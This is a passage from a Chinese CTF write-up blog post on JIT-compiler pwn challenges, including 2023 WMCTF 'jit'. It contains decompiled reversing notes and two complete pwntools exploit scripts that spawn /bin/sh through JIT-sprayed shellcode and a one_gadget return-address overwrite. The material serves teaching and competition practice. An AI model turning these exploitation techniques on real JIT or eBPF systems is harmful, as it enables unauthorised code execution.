AsmHelper::pvar2reg(var1);<br>        AsmHelper::regassign();<br>        <span class="hljs-keyword">break</span>;<br>      <span class="hljs-keyword">case</span> <span class="hljs-number">3u</span>:                                  <span class="hljs-comment">// mov    QWORD PTR [rdi],rsi</span><br>                                                <span class="hljs-comment">// lea    rdi,[rbp-0x10]</span><br>                                                <span class="hljs-comment">// mov    rsi,QWORD PTR [rdi]</span><br>                                                <span class="hljs-comment">// lea    rdi,[rbp-0x8]</span><br>                                                <span class="hljs-comment">// and    QWORD PTR [rdi],rsi</span><br>        v5 = IRstream::getop();<br>        var1_0 = Compiler::var2idx(v5);<br>        v6 = IRstream::getop();<br>        var2_0 = Compiler::var2idx(v6);<br>        AsmHelper::var2reg(var2_0);<br>        AsmHelper::pvar2reg(var1_0);<br>        AsmHelper::regarith(<span class="hljs-number">0x21</span>u);<br>        <span class="hljs-keyword">break</span>;<br>      <span class="hljs-keyword">case</span> <span class="hljs-number">4u</span>:                                  <span class="hljs-comment">// lea    rdi,[rbp-0x10]</span><br>                                                <span class="hljs-comment">// mov    rsi,QWORD PTR [rdi]</span><br>                                                <span class="hljs-comment">// lea    rdi,[rbp-0x8]</span><br>                                                <span class="hljs-comment">// or     QWORD PTR [rdi],rsi</span><br>        v7 = IRstream::getop();<br>        var1_1 = Compiler::var2idx(v7);<br>        v8 = IRstream::getop();<br>        var2_1 = Compiler::var2idx(v8);<br>        AsmHelper::var2reg(var2_1);<br>        AsmHelper::pvar2reg(var1_1);<br>        AsmHelper::regarith(<span class="hljs-number">9u</span>);<br>        <span class="hljs-keyword">break</span>;<br>      <span class="hljs-keyword">case</span> <span class="hljs-number">5u</span>:                                  <span class="hljs-comment">// lea    rdi,[rbp-0x10]</span><br>                                                <span class="hljs-comment">// mov    rsi,QWORD PTR [rdi]</span><br>                                                <span class="hljs-comment">// lea    rdi,[rbp-0x8]</span><br>                                                <span class="hljs-comment">// xor    QWORD PTR [rdi],rsi</span><br>        v9 = IRstream::getop();<br>        var1_2 = Compiler::var2idx(v9);<br>        v10 = IRstream::getop();<br>        var2_2 = Compiler::var2idx(v10);<br>        AsmHelper::var2reg(var2_2);<br>        AsmHelper::pvar2reg(var1_2);<br>        AsmHelper::regarith(<span class="hljs-number">0x31</span>u);<br>        <span class="hljs-keyword">break</span>;<br></code></pre></td></tr></table></figure>

<p>到这里，程序流程已经梳理清楚了，我们如何利用呢？</p>
<p>这里我们无法直接使用syscall等汇编指令，我们可以使用异或等操作得到syscall等汇编指令，但是这里没有加减运算，只有逻辑运算，不容易通过计算得到我们需要的指令。但是，注意到程序对立即数的处理是8bytes的，可以想到，写入<strong>op + jmp</strong>格式的汇编，通过短指令跳转的方式完成利用。</p>
<p>最终wp如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/python</span><br><span class="hljs-comment">#encoding:utf-8</span><br><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> p64<br><br>context.arch = <span class="hljs-string">&#x27;amd64&#x27;</span><br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br><br>fn = <span class="hljs-string">&#x27;./jit&#x27;</span><br>elf = ELF(fn)<br>libc = ELF(<span class="hljs-string">&#x27;/lib/x86_64-linux-gnu/libc.so.6&#x27;</span>)<br><br>debug = <span class="hljs-number">1</span><br><span class="hljs-keyword">if</span> debug:<br>    p = process(fn)<br><br><span class="hljs-keyword">else</span>:<br>    p = remote()<br>    <br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">dbg</span>(<span class="hljs-params">s=<span class="hljs-string">&#x27;&#x27;</span></span>):<br>    <span class="hljs-keyword">if</span> debug:<br>        gdb.attach(p, s)<br>        pause()<br><br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-keyword">pass</span><br>    <br>lg = <span class="hljs-keyword">lambda</span> x, y: log.success(<span class="hljs-string">f&#x27;<span class="hljs-subst">&#123;x&#125;</span>: <span class="hljs-subst">&#123;<span class="hljs-built_in">hex</span>(y)&#125;</span>&#x27;</span>)<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">func</span>(<span class="hljs-params"><span class="hljs-built_in">id</span>, var, local, data</span>):<br>    <span class="hljs-keyword">return</span> <span class="hljs-built_in">bytes</span>([<span class="hljs-number">0xff</span>, <span class="hljs-built_in">id</span>, var, local]) + data<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">op_ret</span>(<span class="hljs-params">var</span>):<br>    <span class="hljs-keyword">return</span> <span class="hljs-built_in">bytes</span>([<span class="hljs-number">0</span>, var])<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">op_define</span>(<span class="hljs-params">var, imm</span>):<br>    <span class="hljs-keyword">return</span> <span class="hljs-built_in">bytes</span>([<span class="hljs-number">1</span>, var]) + p64(imm)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">op_assign</span>(<span class="hljs-params">var1, var2</span>):<br>    <span class="hljs-keyword">return</span> <span class="hljs-built_in">bytes</span>([<span class="hljs-number">2</span>, var1, var2])<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">op_and</span>(<span class="hljs-params">var1, var2</span>):<br>    <span class="hljs-keyword">return</span> <span class="hljs-built_in">bytes</span>([<span class="hljs-number">3</span>, var1, var2])<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">op_or</span>(<span class="hljs-params">var1, var2</span>):<br>    <span class="hljs-keyword">return</span> <span class="hljs-built_in">bytes</span>([<span class="hljs-number">4</span>, var1, var2])<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">op_xor</span>(<span class="hljs-params">var1, var2</span>):<br>    <span class="hljs-keyword">return</span> <span class="hljs-built_in">bytes</span>([<span class="hljs-number">5</span>, var1, var2])<br><br><br>dbg(<span class="hljs-string">&#x27;b *$rebase(0x24ff)&#x27;</span>)<br><br><span class="hljs-comment"># test</span><br><span class="hljs-comment"># data = bytes([0xff, 0, 0, 0x20, 1, 0x81]) + p64(0x0cebe78948)</span><br><span class="hljs-comment"># data += bytes([2, 0x81, 0x82])</span><br><span class="hljs-comment"># data += bytes([3, 0x81, 0x82])</span><br><span class="hljs-comment"># data += bytes([4, 0x81, 0x82])</span><br><span class="hljs-comment"># data += bytes([5, 0x81, 0x82])</span><br><span class="hljs-comment"># data += bytes([0, 0x81])</span><br><span class="hljs-comment"># p.send(data)</span><br><br>jop = func(<span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0x20</span>, flat(<br>    [<br>        op_define(<span class="hljs-number">0x81</span>, <span class="hljs-number">0x0bebf87d8d48</span>),    <span class="hljs-comment"># lea rdi, [rbp - 0x8]; jmp x</span><br>        op_define(<span class="hljs-number">0x81</span>, <span class="hljs-number">0x0cebf63148</span>),      <span class="hljs-comment"># xor rsi, rsi; jmp x</span><br>        op_define(<span class="hljs-number">0x81</span>, <span class="hljs-number">0x0cebd23148</span>),      <span class="hljs-comment"># xor rdx, rdx; jmp x</span><br>        op_define(<span class="hljs-number">0x81</span>, <span class="hljs-number">0x0debc031</span>),        <span class="hljs-comment"># xor eax, eax; jmp x</span><br>        op_define(<span class="hljs-number">0x81</span>, <span class="hljs-number">0x050f3bc083</span>),      <span class="hljs-comment"># add eax, 59; syscall      </span><br>        op_ret(<span class="hljs-number">0x81</span>)<br>    ]<br>))<br><br>shell = func(<span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0x20</span>, flat(<br>    [<br>        op_define(<span class="hljs-number">0x81</span>, <span class="hljs-number">0xfffffffffffff000</span>),<br>        op_define(<span class="hljs-number">0x82</span>, <span class="hljs-number">0x7c</span>),  <span class="hljs-comment"># jop_offset</span><br>        op_and(<span class="hljs-number">0x80</span> | <span class="hljs-number">0x20</span>, <span class="hljs-number">0x81</span>),  <span class="hljs-comment"># ret_addr</span><br>        op_or(<span class="hljs-number">0x80</span> | <span class="hljs-number">0x20</span>, <span class="hljs-number">0x82</span>),<br>        op_define(<span class="hljs-number">0x81</span>, <span class="hljs-number">0x68732f6e69622f</span>),  <span class="hljs-comment"># /bin/sh</span><br>        op_ret(<span class="hljs-number">0x81</span>),<br>    ]<br>))<br><br>payload = shell + jop<br>p.send(payload)<br><br>p.interactive()<br><br></code></pre></td></tr></table></figure>

<p><img src="/img/jit-pwn/image-20230826230005769.png" srcset="/img/loading.gif" lazyload alt="image-20230826230005769"></p>
<h2 id="2023-wmctf-jit"><a href="#2023-wmctf-jit" class="headerlink" title="2023-wmctf-jit"></a>2023-wmctf-jit</h2><p>这道题程序很大，且去掉了符号表，特别难逆，尤其是指令翻译那块，赤裸裸的2000多行代码，直接劝退！复现的时候，发现很多大佬都是直接插看ebpf指令集，然后发现题目也是提示ebpf了。</p>
<p>查看保护。</p>
<p><img src="/img/jit-pwn/image-20230827231817064.png" srcset="/img/loading.gif" lazyload alt="image-20230827231817064"></p>
<p>逆向时，发现是C++实现的，于是我们可以有意识的向string或者vector等常用的容器靠拢。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs c">program.begin = v19;<br>program.length = <span class="hljs-number">0LL</span>;<br>v19[<span class="hljs-number">0</span>] = <span class="hljs-number">0</span>;<br>memory.begin = v21;<br>memory.length = <span class="hljs-number">0LL</span>;<br>v21[<span class="hljs-number">0</span>] = <span class="hljs-number">0</span>;<br><span class="hljs-built_in">std</span>::operator&lt;&lt;&lt;<span class="hljs-built_in">std</span>::char_traits&lt;<span class="hljs-type">char</span>&gt;&gt;(&amp;<span class="hljs-built_in">std</span>::<span class="hljs-built_in">cout</span>, <span class="hljs-string">&quot;Program: &quot;</span>);<br><span class="hljs-built_in">std</span>::getline&lt;<span class="hljs-type">char</span>,<span class="hljs-built_in">std</span>::char_traits&lt;<span class="hljs-type">char</span>&gt;,<span class="hljs-built_in">std</span>::allocator&lt;<span class="hljs-type">char</span>&gt;&gt;(&amp;<span class="hljs-built_in">std</span>::<span class="hljs-built_in">cin</span>, &amp;program);<br><span class="hljs-keyword">if</span> ( !memory.length )<br>&#123;<br>    <span class="hljs-built_in">std</span>::operator&lt;&lt;&lt;<span class="hljs-built_in">std</span>::char_traits&lt;<span class="hljs-type">char</span>&gt;&gt;(&amp;<span class="hljs-built_in">std</span>::<span class="hljs-built_in">cout</span>, <span class="hljs-string">&quot;Memory: &quot;</span>);<br>    <span class="hljs-built_in">std</span>::getline&lt;<span class="hljs-type">char</span>,<span class="hljs-built_in">std</span>::char_traits&lt;<span class="hljs-type">char</span>&gt;,<span class="hljs-built_in">std</span>::allocator&lt;<span class="hljs-type">char</span>&gt;&gt;(&amp;<span class="hljs-built_in">std</span>::<span class="hljs-built_in">cin</span>, &amp;memory);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>程序一开始，初始化类型应该为string的program与memory，然后获取用户输入。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs c">sub_8940(&amp;v17, &amp;program);<br>sub_8860(&amp;v16, (__int64)&amp;v17);                <span class="hljs-comment">// copy</span><br><span class="hljs-keyword">if</span> ( v17.start )<br>    operator <span class="hljs-title function_">delete</span><span class="hljs-params">(v17.start)</span>;<br>sub_8940(&amp;v17, &amp;memory);<br></code></pre></td></tr></table></figure>

<p>接着，程序将program赋值到vector容器v17中，并复制到v16中。类似的，将memory赋值到v17中。通过对<code>sub_8940</code>的简单逆向，可以看出程序要求输入16进制字符串。</p>
<p><img src="/img/jit-pwn/image-20230827232559934.png" srcset="/img/loading.gif" lazyload alt="image-20230827232559934"></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs c">ptr = <span class="hljs-number">0LL</span>;<br>inited = Init_vm();<br><span class="hljs-keyword">if</span> ( !inited )<br>    <span class="hljs-keyword">goto</span> LABEL_10;<br>v4 = (__int64)qword_E098;<br><span class="hljs-keyword">if</span> ( qword_E098 != (<span class="hljs-type">char</span> *)&amp;dword_E088 )<br>&#123;<br>    <span class="hljs-keyword">while</span> ( !(<span class="hljs-type">unsigned</span> <span class="hljs-type">int</span>)sub_2EA0(inited, *(_DWORD *)(v4 + <span class="hljs-number">0x20</span>), (__int64)<span class="hljs-string">&quot;unnamed&quot;</span>, *(_QWORD *)(v4 + <span class="hljs-number">0x28</span>)) )<br>    &#123;<br>        v4 = <span class="hljs-built_in">std</span>::_Rb_tree_increment();<br>        <span class="hljs-keyword">if</span> ( (<span class="hljs-type">int</span> *)v4 == &amp;dword_E088 )<br>            <span class="hljs-keyword">goto</span> LABEL_22;<br>    &#125;<br>    <span class="hljs-keyword">goto</span> LABEL_10;<br>&#125;<br>LABEL_22:<br><span class="hljs-keyword">if</span> ( (<span class="hljs-type">unsigned</span> <span class="hljs-type">int</span>)sub_2ED0(inited, <span class="hljs-number">5</span>) )<br>&#123;<br>    LABEL_10:<br>    <span class="hljs-built_in">std</span>::__ostream_insert&lt;<span class="hljs-type">char</span>,<span class="hljs-built_in">std</span>::char_traits&lt;<span class="hljs-type">char</span>&gt;&gt;();<br>    <span class="hljs-built_in">std</span>::<span class="hljs-built_in">endl</span>&lt;<span class="hljs-type">char</span>,<span class="hljs-built_in">std</span>::char_traits&lt;<span class="hljs-type">char</span>&gt;&gt;(&amp;<span class="hljs-built_in">std</span>::<span class="hljs-built_in">cerr</span>);<br>    v5 = <span class="hljs-number">1</span>;<br>    <span class="hljs-keyword">goto</span> LABEL_11;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>这一部分，主要是对vm虚拟机类进行初始化。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs c">v5 = load_program(inited, (__int64 *)v16.start, v16.finish - v16.start, (__int64 *)&amp;ptr, v7, v8);<br><span class="hljs-keyword">if</span> ( !v5 )<br>&#123;<br>    mmap_addr = sub_8510(inited, (__int64 *)&amp;ptr);<span class="hljs-comment">// 指令翻译 + mmap</span><br>    <span class="hljs-keyword">if</span> ( mmap_addr )<br>    &#123;<br>        v10 = ((__int64 (__fastcall *)(<span class="hljs-type">char</span> *, <span class="hljs-type">signed</span> __int64))mmap_addr)(v17.start, v17.finish - v17.start);<span class="hljs-comment">// shellcode</span><br>        <span class="hljs-built_in">std</span>::__ostream_insert&lt;<span class="hljs-type">char</span>,<span class="hljs-built_in">std</span>::char_traits&lt;<span class="hljs-type">char</span>&gt;&gt;();<br>        *(_DWORD *)((<span class="hljs-type">char</span> *)&amp;<span class="hljs-built_in">std</span>::<span class="hljs-built_in">cout</span> + *(_QWORD *)(<span class="hljs-built_in">std</span>::<span class="hljs-built_in">cout</span> - <span class="hljs-number">24LL</span>) + <span class="hljs-number">24</span>) = *(_DWORD *)((_BYTE *)&amp;<span class="hljs-built_in">std</span>::<span class="hljs-built_in">cout</span><br>                                                                                           + *(_QWORD *)(<span class="hljs-built_in">std</span>::<span class="hljs-built_in">cout</span> - <span class="hljs-number">24LL</span>)<br>                                                                                           + <span class="hljs-number">24</span>) &amp; <span class="hljs-number">0xFFFFFFB5</span> | <span class="hljs-number">8</span>;<br>        v11 = <span class="hljs-built_in">std</span>::ostream::_M_insert&lt;<span class="hljs-type">unsigned</span> <span class="hljs-type">long</span>&gt;(&amp;<span class="hljs-built_in">std</span>::<span class="hljs-built_in">cout</span>, v10);<br>        <span class="hljs-built_in">std</span>::<span class="hljs-built_in">endl</span>&lt;<span class="hljs-type">char</span>,<span class="hljs-built_in">std</span>::char_traits&lt;<span class="hljs-type">char</span>&gt;&gt;(v11);<br></code></pre></td></tr></table></figure>

<p>这部分是程序最重要的部分。大致逻辑为将v16，即program输入到虚拟机中。然后，对虚拟机指令进行翻译，并返回mmap地址。最后，执行shellcode。</p>
<p>指令翻译的调用流程大致如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs c">sub_8510 -&gt; sub_84E0 -&gt; sub_8370 -&gt; sub_5A50	<span class="hljs-comment">// 指令翻译</span><br></code></pre></td></tr></table></figure>

<p><code>sub_5A50</code>将近2000来行，笔者太菜了，这里直接run。</p>
<p>直接看<a target="_blank" rel="noopener" href="https://github.com/iovisor/bpf-docs/blob/master/eBPF.md">ebpf文档</a>翻译指令，文档对指令的定义以及操作都描述的很清楚了，这里就不再赘述了。</p>
<p>我们做一个大致的测试，得到指令允许的操作对象。</p>
<p>这里限制指令数的操作是在<code>load_program</code>函数中。</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-comment"># test regs index</span><br>payload = <span class="hljs-string">b&#x27;&#x27;</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">10</span>):<br>    payload += p64(add_imm(i, <span class="hljs-number">0x8</span>))<br>payload += p64(load_src(<span class="hljs-number">10</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0x8</span>))<br></code></pre></td></tr></table></figure>

<p><img src="/img/jit-pwn/image-20230826230155195.png" srcset="/img/loading.gif" lazyload alt="image-20230826230155195"></p>
<p>可以看到我们可以操作大部分寄存器，甚至可以直接操作rbp，即栈中内容。</p>
<p>大致想法就是覆盖栈上返回地址为ogg。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/python</span><br><span class="hljs-comment">#encoding:utf-8</span><br><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> p8, p16, p32, p64<br><br>context.arch = <span class="hljs-string">&#x27;amd64&#x27;</span><br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br><br>fn = <span class="hljs-string">&#x27;./jit&#x27;</span><br>elf = ELF(fn)<br>libc = ELF(<span class="hljs-string">&#x27;/lib/x86_64-linux-gnu/libc.so.6&#x27;</span>)<br><br>debug = <span class="hljs-number">1</span><br><span class="hljs-keyword">if</span> debug:<br>    p = process(fn)<br><br><span class="hljs-keyword">else</span>:<br>    p = remote()<br>    <br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">dbg</span>(<span class="hljs-params">s=<span class="hljs-string">&#x27;&#x27;</span></span>):<br>    <span class="hljs-keyword">if</span> debug:<br>        gdb.attach(p, s)<br>        pause()<br><br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-keyword">pass</span><br>    <br>lg = <span class="hljs-keyword">lambda</span> x, y: log.success(<span class="hljs-string">f&#x27;<span class="hljs-subst">&#123;x&#125;</span>: <span class="hljs-subst">&#123;<span class="hljs-built_in">hex</span>(y)&#125;</span>&#x27;</span>)<br><br>command = <span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-string">b *$rebase(0x293A)</span><br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br><br>regs = [<br>    <span class="hljs-string">&#x27;rax&#x27;</span>, <span class="hljs-string">&#x27;rdi&#x27;</span>, <span class="hljs-string">&#x27;rsi&#x27;</span>, <span class="hljs-string">&#x27;rdx&#x27;</span>, <span class="hljs-string">&#x27;r9&#x27;</span>, <span class="hljs-string">&#x27;r8&#x27;</span>, <span class="hljs-string">&#x27;rbx&#x27;</span>, <span class="hljs-string">&#x27;r13&#x27;</span>, <span class="hljs-string">&#x27;r14&#x27;</span>, <span class="hljs-string">&#x27;r15&#x27;</span>, <span class="hljs-string">&#x27;rbp&#x27;</span><br>]<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">Inst</span>(<span class="hljs-params">opcode, dst=<span class="hljs-number">0</span>, src=<span class="hljs-number">0</span>, offset=<span class="hljs-number">0</span>, imm=<span class="hljs-number">0</span></span>):<br>    <span class="hljs-keyword">if</span> <span class="hljs-built_in">isinstance</span>(dst, <span class="hljs-built_in">str</span>):<br>        dst = regs.index(dst.lower().strip())<br>    <span class="hljs-keyword">if</span> <span class="hljs-built_in">isinstance</span>(src, <span class="hljs-built_in">str</span>):<br>        src = regs.index(src.lower().strip())<br><br>    inst = <span class="hljs-number">0</span><br>    inst |= opcode<br>    inst |= dst &lt;&lt; <span class="hljs-number">8</span><br>    inst |= src &lt;&lt; <span class="hljs-number">12</span><br>    inst |= offset &lt;&lt; <span class="hljs-number">16</span><br>    inst |= imm &lt;&lt; <span class="hljs-number">32</span><br>    <span class="hljs-keyword">return</span> inst<br><br><br>add_imm = <span class="hljs-keyword">lambda</span> dst, imm: Inst(<span class="hljs-number">0x07</span>, dst, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, imm)   <span class="hljs-comment"># add dst, imm</span><br>sub_imm = <span class="hljs-keyword">lambda</span> dst, imm: Inst(<span class="hljs-number">0x17</span>, dst, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, imm)   <span class="hljs-comment"># sub dst, imm</span><br>load_src = <span class="hljs-keyword">lambda</span> dst, src, off: Inst(<span class="hljs-number">0x7b</span>, dst, src, off, <span class="hljs-number">0</span>)   <span class="hljs-comment"># mov dst. src</span><br><br><span class="hljs-comment"># dbg(command)</span><br><br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-string"># test regs index</span><br><span class="hljs-string">payload = b&#x27;&#x27;</span><br><span class="hljs-string">for i in range(10):</span><br><span class="hljs-string">    payload += p64(add_imm(i, 0x8))</span><br><span class="hljs-string">payload += p64(load_src(10, 0, 0x8))</span><br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br><br>memcpy_got = elf.got[<span class="hljs-string">&#x27;memcpy&#x27;</span>]<br><br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-string"># leak_libc_version</span><br><span class="hljs-string">payload = flat(</span><br><span class="hljs-string">    [</span><br><span class="hljs-string">        sub_imm(&#x27;rbx&#x27;, 0xe088),     # codebase</span><br><span class="hljs-string">        mov_src(&#x27;rdi&#x27;, &#x27;r14&#x27;),</span><br><span class="hljs-string">        mov_src(&#x27;rsi&#x27;, &#x27;rbx&#x27;),</span><br><span class="hljs-string">        add_imm(&#x27;rsi&#x27;, memcpy_got),</span><br><span class="hljs-string">        add_imm(&#x27;rbx&#x27;, 0x270A),</span><br><span class="hljs-string">        load_src(&#x27;rbp&#x27;, &#x27;rbx&#x27;, 0x28),</span><br><span class="hljs-string">    ]</span><br><span class="hljs-string">)</span><br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br><br>one_gadget = [<span class="hljs-number">0xe3afe</span>, <span class="hljs-number">0xe3b01</span>, <span class="hljs-number">0xe3b04</span>]<br><br>payload = flat(<br>    [<br>        sub_imm(<span class="hljs-string">&#x27;rax&#x27;</span>, <span class="hljs-number">0x58b000</span>),   <span class="hljs-comment"># libc_addr,</span><br>        add_imm(<span class="hljs-string">&#x27;rax&#x27;</span>, one_gadget[<span class="hljs-number">1</span>]),<br>        load_src(<span class="hljs-string">&#x27;rbp&#x27;</span>, <span class="hljs-string">&#x27;rax&#x27;</span>, <span class="hljs-number">0x138</span>)<br>    ]<br>)<br>payload = payload.<span class="hljs-built_in">hex</span>()<br>p.sendlineafter(<span class="hljs-string">&#x27;Program: &#x27;</span>, payload)<br>p.sendlineafter(<span class="hljs-string">&#x27;Memory: &#x27;</span>, p64(<span class="hljs-number">0x100</span>).<span class="hljs-built_in">hex</span>())<br><br>p.interactive()<br></code></pre></td></tr></table></figure>

<p><img src="/img/jit-pwn/image-20230826230249320.png" srcset="/img/loading.gif" lazyload alt="image-20230826230249320"></p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>通过上述两道题，可以知道jit类型的pwn难点在于指令翻译的过程，利用大部分是shellcode构造。</p>
<p>收获很大，继续加油！</p>
<h2 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h2><p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/dzhou/p/9549839.html">https://www.cnblogs.com/dzhou/p/9549839.html</a></p>
<p><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/361250220">https://zhuanlan.zhihu.com/p/361250220</a></p>
